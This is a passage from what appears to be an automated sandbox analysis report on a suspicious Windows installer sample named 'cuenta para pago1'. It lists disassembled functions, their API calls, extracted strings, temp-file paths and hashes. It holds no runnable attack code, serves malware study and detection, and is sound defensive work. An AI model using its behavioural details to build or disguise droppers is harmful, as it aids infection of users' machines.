                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                      • String ID: verifying installer: %d%%
                                                                                      • API String ID: 1451636040-82062127
                                                                                      • Opcode ID: e1c014fc95bc23661624503e4522ac552ab2ae52810cd3c8af91e79be824a7f3
                                                                                      • Instruction ID: 3cda0e2316cf55cb202c1321fdb8a93457d01500b45ed37e1556afe5f89d55e5
                                                                                      • Opcode Fuzzy Hash: e1c014fc95bc23661624503e4522ac552ab2ae52810cd3c8af91e79be824a7f3
                                                                                      • Instruction Fuzzy Hash: 1D014470500209ABEF249F61DD49FEA3B69EB04344F008035FA05A92D0DBB999548B59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 100022D0 Relevance: 9.1, APIs: 6, Instructions: 136memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                                                        • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                      • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4068876231.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4068842862.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4068909846.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4068953066.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                      • String ID:
                                                                                      • API String ID: 4216380887-0
                                                                                      • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                      • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                                                      • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                      • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 100024A9 Relevance: 9.1, APIs: 6, Instructions: 98COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                      • GlobalFree.KERNEL32(?), ref: 10002572
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4068876231.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4068842862.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4068909846.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4068953066.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloc
                                                                                      • String ID:
                                                                                      • API String ID: 1780285237-0
                                                                                      • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                      • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                                                      • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                      • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402840 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                                      • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                      • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2667972263-0
                                                                                      • Opcode ID: c4672cc438bfb976ad63f3b88f6fa6a1cd5959f413ccf8879598efff8088fe0d
                                                                                      • Instruction ID: c1a5639659a60ac5c9bd0712390274ed5d57598099091cca2b2fb0d84b3ff26b
                                                                                      • Opcode Fuzzy Hash: c4672cc438bfb976ad63f3b88f6fa6a1cd5959f413ccf8879598efff8088fe0d
                                                                                      • Instruction Fuzzy Hash: 1621AC72C04128BBCF216FA5CD49D9E7E79EF09324F24023AF520762E1C7795D418BA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00404935 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049D6
                                                                                      • wsprintfW.USER32 ref: 004049DF
                                                                                      • SetDlgItemTextW.USER32(?,004226E8), ref: 004049F2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                      • String ID: %u.%u%s%s$&B
                                                                                      • API String ID: 3540041739-2907463167
                                                                                      • Opcode ID: 0ddaf8743021833403b6e28cda1e3337aa5d1e434209783b13d21619e8b34570
                                                                                      • Instruction ID: 7355c158aba8d6b586dda53eb311f6ba2c540b654501303b209b4c25e60a8b93
                                                                                      • Opcode Fuzzy Hash: 0ddaf8743021833403b6e28cda1e3337aa5d1e434209783b13d21619e8b34570
                                                                                      • Instruction Fuzzy Hash: 4711D8736041387BEB10A57D9C41E9F368C9B85374F250237FA26F61D2DA79C81282E8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402537 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsqE113.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,00000400,?,?,00000021), ref: 00402583
                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsqE113.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,00000400,?,?,00000021), ref: 0040258E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWidelstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsqE113.tmp$C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll
                                                                                      • API String ID: 3109718747-2042789371
                                                                                      • Opcode ID: ff5357058379e204ff40c3465f338181e73ead3c1c5b926bf222a7f711fefd23
                                                                                      • Instruction ID: 2aea9811a9a124710f812c99978ab25d5578c47fcc6e4ef6251516289d3ba225
                                                                                      • Opcode Fuzzy Hash: ff5357058379e204ff40c3465f338181e73ead3c1c5b926bf222a7f711fefd23
                                                                                      • Instruction Fuzzy Hash: 73113A32A41214BEDB10AFB18F4AE9E3264AF94385F20403BF402F61C2D6FC8E41562E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405AD6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 47stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0040601A: lstrcpynW.KERNEL32(?,?,00000400,00403317,00428200,NSIS Error), ref: 00406027
                                                                                        • Part of subcall function 00405A79: CharNextW.USER32(?,?,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,?,00405AED,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon, 4Ww,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,77573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A87
                                                                                        • Part of subcall function 00405A79: CharNextW.USER32(00000000), ref: 00405A8C
                                                                                        • Part of subcall function 00405A79: CharNextW.USER32(00000000), ref: 00405AA4
                                                                                      • lstrlenW.KERNEL32(dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,00000000,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon, 4Ww,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,77573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B2F
                                                                                      • GetFileAttributesW.KERNEL32(dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,00000000,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon, 4Ww,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,77573420,C:\Users\user\AppData\Local\Temp\), ref: 00405B3F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                      • String ID: 4Ww$C:\Users\user\AppData\Local\Temp\$dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon
                                                                                      • API String ID: 3248276644-1436605439
                                                                                      • Opcode ID: a98bc8d6da3f7a1147296ea9518b403604e3dfaf614f974499b81bc4e28990f4
                                                                                      • Instruction ID: ed71898f9691fad2d221d0acf12a8c788c2999d668287f0dc65a00c2ad5638d3
                                                                                      • Opcode Fuzzy Hash: a98bc8d6da3f7a1147296ea9518b403604e3dfaf614f974499b81bc4e28990f4
                                                                                      • Instruction Fuzzy Hash: 4CF04425301E5115CA22367A2C44AAF2414DFC236474A073BF842B22D1CA3CA943DDBE
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                      • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4068876231.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4068842862.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4068909846.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4068953066.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                      • String ID:
                                                                                      • API String ID: 1148316912-0
                                                                                      • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                      • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                      • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                      • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401CFA Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                      • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                      • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                      • String ID:
                                                                                      • API String ID: 1849352358-0
                                                                                      • Opcode ID: cbab7166b0a94f5ac455d44aeb6c9a0590807e083444e8b07b032d0ff1b104c8
                                                                                      • Instruction ID: e9fcbf52d61700e0958b70f2e427462db2dea441f2720d4c42107852d76fa8f5
                                                                                      • Opcode Fuzzy Hash: cbab7166b0a94f5ac455d44aeb6c9a0590807e083444e8b07b032d0ff1b104c8
                                                                                      • Instruction Fuzzy Hash: F1F0E172A04104AFD701DBE4DE88CEEBBBDEB48311B104466F601F51A1C674ED418B39
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401D56 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDC.USER32(?), ref: 00401D59
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                      • CreateFontIndirectW.GDI32(0040BDB0), ref: 00401DD1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                      • String ID:
                                                                                      • API String ID: 3808545654-0
                                                                                      • Opcode ID: 06fadfaa6bdd1743c224a57f1fa3d051dabd33ef56df0071652300793eec0471
                                                                                      • Instruction ID: fb6460544efe8fce5462e25cc9af4f7d3d1b7b368dfcdde6bb1bed5e2218b2c2
                                                                                      • Opcode Fuzzy Hash: 06fadfaa6bdd1743c224a57f1fa3d051dabd33ef56df0071652300793eec0471
                                                                                      • Instruction Fuzzy Hash: BC01A231958281AFE7026BB0AE0AB9A7F74FF25301F004479F501B62E2C77810048B6E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405A79 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CharNextW.USER32(?,?,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,?,00405AED,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon, 4Ww,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,77573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A87
                                                                                      • CharNextW.USER32(00000000), ref: 00405A8C
                                                                                      • CharNextW.USER32(00000000), ref: 00405AA4
                                                                                      Strings
                                                                                      • dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon, xrefs: 00405A7A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext
                                                                                      • String ID: dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon
                                                                                      • API String ID: 3213498283-4087429501
                                                                                      • Opcode ID: 9abac7bd8d8eb78344d3a0fd8b33b6e2d04e06e22655e8e5944c69e008adfdc9
                                                                                      • Instruction ID: 2b58bc667f998461ca91ac7b18547026c13bd309f09f4c7a6bbb9f4139172dd1
                                                                                      • Opcode Fuzzy Hash: 9abac7bd8d8eb78344d3a0fd8b33b6e2d04e06e22655e8e5944c69e008adfdc9
                                                                                      • Instruction Fuzzy Hash: 09F09611B10B1295DB3276544CC5A7766BCEF94361F14823BE501B72C0E3FC48818FEA
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004059CE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403257,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 004059D4
                                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403257,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 004059DE
                                                                                      • lstrcatW.KERNEL32(?,00409014), ref: 004059F0
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004059CE
                                                                                      Memory Dump Source
